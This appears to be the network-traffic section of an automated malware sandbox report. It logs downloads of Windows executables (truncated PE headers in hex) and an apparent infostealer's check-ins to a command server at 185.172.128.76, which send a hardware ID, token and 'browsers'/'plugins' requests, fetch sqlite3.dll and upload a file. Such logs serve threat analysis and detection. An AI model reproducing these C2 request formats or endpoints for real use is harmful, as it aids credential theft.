                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:19:52 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Apr 2024 00:19:53 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:20:17 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:20:22 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Apr 2024 00:20:51 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: POST /v2/track HTTP/1.1Content-Type: application/x-json-streamContent-Encoding: gzipHost: westus2-2.in.applicationinsights.azure.comContent-Length: 850Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBHost: 185.172.128.76Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 45 31 42 46 37 46 41 32 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="hwid"22E1BF7FA224796922796------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="build"default10------DHCAAEBKEGHJKEBFHJDB--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="message"browsers------DAFIEHIEGDHIDGDGHDHJ--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="message"plugins------DHCAAEBKEGHJKEBFHJDB--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECAHost: 185.172.128.76Content-Length: 6179Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAHost: 185.172.128.76Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAAHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 2d 2d 0d 0a Data Ascii: ------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="file"------ECBGIEHDBAAFIDGDAAAA--
